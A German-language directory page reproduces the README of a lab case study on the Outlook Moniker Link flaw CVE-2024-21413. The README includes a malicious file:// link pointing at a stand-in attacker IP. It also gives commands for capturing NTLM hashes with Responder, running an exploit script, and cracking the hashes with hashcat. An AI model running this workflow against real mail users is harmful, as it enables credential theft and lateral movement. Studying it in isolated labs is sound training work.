Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Estudo-de-Caso-CVE-2024-21413 — Eine Fallstudie zu CVE-2024-21413. Verwendet als Parameter den Raum TryHackMe Moniker Link (CVE-2024-21413). Es wurden Bearbeitungen mit claude code am Exploit vorgenommen. | Kitploit
Tools/GitHubGitHub/pedro-lucas-melo/estudo-de-caso-cve-2024-21413
Passwort-CrackingSchwachstellenanalyseExploitationLaterale BewegungPhishingCTFLernen & BildungE-Mail-SicherheitLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubpedro-lucas-melo/estudo-de-caso-cve-2024-21413

Estudo-de-Caso-CVE-2024-21413

Eine Fallstudie zu CVE-2024-21413. Verwendet als Parameter den Raum TryHackMe Moniker Link (CVE-2024-21413). Es wurden Bearbeitungen mit claude code am Exploit vorgenommen.

Repository anzeigen
7vor 5 MonatenNoch nicht geprüft

CVE-2024-21413 — Moniker Link 🔗💀

Microsoft Outlook RCE + NTLM Credential Leak

⚠️ Rechtlicher Hinweis: Dieses Repository dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Alle Demonstrationen wurden in kontrollierten und isolierten Umgebungen durchgeführt. Die Nutzung dieser Techniken gegen Systeme ohne ausdrückliche Genehmigung ist illegal und unethisch.


📋 Inhaltsverzeichnis

  • Übersicht
  • Wie die Schwachstelle funktioniert
  • Laborumgebung
  • Schritt-für-Schritt-Demonstration
  • Exploit-Skript
  • Angriffsdiagramm
  • Abschwächung und Verteidigung
  • CVE Breakdown
  • Referenzen

🔍 Übersicht

FeldDetail
CVECVE-2024-21413
Veröffentlichung13. Februar 2024 (Patch Tuesday)
CVSS Score9.8 (Kritisch)
ProduktMicrosoft Outlook
TypRCE + Credential Leak (NTLM Hash)
VektorNetzwerk / E-Mail (ohne vorherige Authentifizierung)
InteraktionBenutzerinteraktion erforderlich (Klicken auf den Link)
SpitznameMoniker Link

CVE-2024-21413 ist eine kritische Schwachstelle in Microsoft Outlook, die es einem Angreifer ermöglicht:

  1. NTLM-Anmeldeinformationen des Opfers preiszugeben, indem eine automatische SMB-Authentifizierung erzwungen wird
  2. Code remote auf dem Zielrechner auszuführen über einen bösartigen Link in einer E-Mail

Der Name „Moniker Link" leitet sich von der Ausnutzung von Component Object Model (COM) Monikern ab – einem Windows-Mechanismus zum Referenzieren von Objekten per Zeichenfolge – um die Schutzmechanismen von Outlook gegen file://-Links zu umgehen.


🧠 Wie die Schwachstelle funktioniert

Das Problem: Umgehung der Protected View

Normalerweise blockiert Outlook file://-Links, die auf Netzwerkressourcen verweisen, und zeigt eine Sicherheitswarnung (Protected View) an. Der Fehler liegt in der Art und Weise, wie Outlook URLs verarbeitet, die das Zeichen ! enthalten – ein Trennzeichen für Moniker.

Die Ausnutzung

Ein bösartiger Link im Format:

root@kitploit:~
file:///\\ATTACKER_IP\share\!something

Das Zeichen ! bewirkt, dass der Parser von Outlook die URL als Referenz auf einen COM-Moniker interpretiert und dabei die normalen Sicherheitsprüfungen umgeht. Das Ergebnis:

  • Der Rechner des Opfers versucht automatisch, sich über SMB beim Server des Angreifers zu authentifizieren
  • Während dieser Authentifizierung wird der NTLM-Hash des Opfers übertragen
  • Dieser Hash kann in Pass-the-Hash-Angriffen verwendet oder offline geknackt werden

Vereinfachter Ablauf

root@kitploit:~
Angreifer sendet E-Mail → Opfer klickt auf Link → Outlook verarbeitet URL mit "!"
→ Umgehung der Protected View → Automatische SMB-Verbindung → NTLM-Hash erfasst

🖥️ Laborumgebung

Um diese Fallstudie sicher nachzustellen:

RechnerBetriebssystemRolle
AngreiferKali LinuxSMB-Listener + Exploit
ZielWindows 10/11 mit anfälligem OutlookOpfer

Wichtig: Verwenden Sie ein isoliertes Netzwerk (NAT oder Host-Only in VirtualBox/VMware). Führen Sie dies niemals in realen Netzwerken aus.

Erforderliche Werkzeuge

root@kitploit:~
# Responder – SMB/HTTP-Listener zum Erfassen von Hashes
sudo apt install responder

# Python 3 – zum Ausführen des Exploits
python3 --version

# Verbindung zwischen den Rechnern prüfen
ping <ZIEL_IP>

🚀 Schritt-für-Schritt-Demonstration

Schritt 1 – IP des Angreifer-Rechners ermitteln

root@kitploit:~
ip a | grep inet
# Notieren Sie die IP des Interfaces, das mit dem Ziel kommuniziert (z.B. 192.168.56.10)

Schritt 2 – Responder starten

Responder erstellt einen gefälschten SMB-Server, der NTLM-Authentifizierungs-Hashes erfasst.

root@kitploit:~
sudo responder -I eth0 -v
# Ersetzen Sie eth0 durch Ihr Netzwerk-Interface

Erwartete Ausgabe:

root@kitploit:~
[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-OPFER\benutzer
[SMB] NTLMv2-SSP Hash     : benutzer::DESKTOP-OPFER:...

Schritt 3 – Exploit ausführen

root@kitploit:~
python3 exploit.py \
  --sender [email protected] \
  --recipient [email protected] \
  --server <EMAIL_SERVER_IP> \
  --attacker-ip 192.168.56.10

Schritt 4 – Warten, bis das Opfer auf den Link klickt

Wenn das Opfer die E-Mail öffnet und auf den Link klickt, erfasst Responder automatisch den NTLM-Hash. Dieser Hash kann:

  • Analysiert werden, um das kompromittierte Konto zu identifizieren
  • Für Pass-the-Hash zur seitlichen Authentifizierung im Netzwerk verwendet werden
  • An Hashcat/John zum offline Knacken gesendet werden:
root@kitploit:~
hashcat -m 5600 hash.txt wordlist.txt

🐍 Exploit-Skript

Siehe die Datei exploit.py für das vollständige, kommentierte Skript.


📊 Angriffsdiagramm

Siehe die Datei diagrama-ataque.html für eine interaktive Visualisierung des vollständigen Angriffsablaufs.


🛡️ Abschwächung und Verteidigung

Siehe die Datei MITIGACAO.md für den vollständigen Leitfaden zu Abschwächung und Verteidigung.


📄 CVE Breakdown

Siehe die Datei CVE-BREAKDOWN.md für die detaillierte technische Analyse der Schwachstelle.


📚 Referenzen

  • Microsoft Security Advisory — CVE-2024-21413
  • Morphisec — Moniker Link Research
  • TryHackMe — Moniker Link Room
  • Responder Tool — GitHub
  • NTLM Authentication — Microsoft Docs
  • NVD — CVE-2024-21413

👤 Autor

Fallstudie entwickelt als Teil des praktischen Trainings in offensiver Sicherheit über TryHackMe.

Dieses Projekt folgt den Prinzipien von Responsible Disclosure und Ethical Hacking. Alle hier enthaltenen Inhalte dienen der Bildung und der Verbesserung der Sicherheitslage.

Tool herunterladen